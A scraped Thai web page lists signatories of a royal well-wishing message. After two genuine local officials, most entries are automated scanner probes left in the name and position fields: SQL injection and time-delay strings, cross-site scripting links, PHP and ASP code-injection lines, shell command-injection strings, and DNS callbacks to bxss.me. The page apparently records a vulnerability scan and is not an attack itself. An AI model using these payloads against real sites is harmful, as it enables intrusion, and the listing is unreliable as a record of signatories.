ผู้ร่วมลงนามถวายพระพร +เพิ่มข้อมูล

ลำดับ ชื่อ-นามสกุล ตำแหน่ง/หน่วยงาน
159 นายสรพงษ์ แสนวิเศษ นายกองค์การบริหารส่วนตำบลพุแค
160 นายปรองคุณ บรรพต รองนายกองค์การบริหารส่วนตำบลพุแค
161 gBqsPxAZ gBqsPxAZ
162 gBqsPxAZ gBqsPxAZ
163 HttP://bxss.me/t/xss.html?%00 gBqsPxAZ
164 gBqsPxAZ gBqsPxAZ
165 bxss.me/t/xss.html?%00 gBqsPxAZ
166 -1 OR 2+211-211-1=0+0+0+1 -- gBqsPxAZ
167 gBqsPxAZ HttP://bxss.me/t/xss.html?%00
168 response.write(9466158*9114053) gBqsPxAZ
169 -1 OR 2+869-869-1=0+0+0+1 gBqsPxAZ
170 gBqsPxAZ bxss.me/t/xss.html?%00
171 '+response.write(9466158*9114053)+' gBqsPxAZ
172 -1' OR 2+584-584-1=0+0+0+1 -- gBqsPxAZ
173 ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); gBqsPxAZ
174 '.gethostbyname(lc('hitnu'.'dsirdxkqe7242.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(90).ch gBqsPxAZ
175 "+response.write(9466158*9114053)+" gBqsPxAZ
176 ) gBqsPxAZ
177 -1' OR 2+894-894-1=0+0+0+1 or 'h95xO5BN'=' gBqsPxAZ
178 ';print(md5(31337));$a=' gBqsPxAZ
179 ".gethostbyname(lc("hitft"."mwlphjoq3a663.bxss.me."))."A".chr(67).chr(hex("58")).chr(100).chr(87).ch gBqsPxAZ
180 gBqsPxAZ response.write(9395439*9761742)
181 !(()&&!|*|*| gBqsPxAZ
182 -1" OR 2+293-293-1=0+0+0+1 -- gBqsPxAZ
183 ";print(md5(31337));$a=" gBqsPxAZ
184 gBqsPxAZ '.gethostbyname(lc('hitng'.'wbvrgcge6417a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(82).chr(114).chr(79).'
185 gBqsPxAZ '+response.write(9395439*9761742)+'
186 ^(#$!@#$)(()))****** gBqsPxAZ
187 if(now()=sysdate(),sleep(15),0) gBqsPxAZ
188 ${@print(md5(31337))} gBqsPxAZ
189 gBqsPxAZ ".gethostbyname(lc("hitva"."kjevmkkl368ee.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(65).chr(117).chr(68)."
190 gBqsPxAZ "+response.write(9395439*9761742)+"
191 gBqsPxAZ )
192 http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg gBqsPxAZ
193 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z gBqsPxAZ
194 ${@print(md5(31337))}\ gBqsPxAZ
195 echo pujkjj$()\ nhnuiz\nz^xyu||a #' &echo pujkjj$()\ nhnuiz\nz^xyu||a #|" &echo pujkjj$()\ nhnuiz\nz gBqsPxAZ
196 gBqsPxAZ !(()&&!|*|*|
197 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z gBqsPxAZ
198 1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg gBqsPxAZ
199 '.print(md5(31337)).' gBqsPxAZ
200 '" gBqsPxAZ
201 &echo oovbrz$()\ dasvey\nz^xyu||a #' &echo oovbrz$()\ dasvey\nz^xyu||a #|" &echo oovbrz$()\ dasvey\n gBqsPxAZ
202 (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select( gBqsPxAZ
203 Http://bxss.me/t/fit.txt gBqsPxAZ
204 gBqsPxAZ ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
205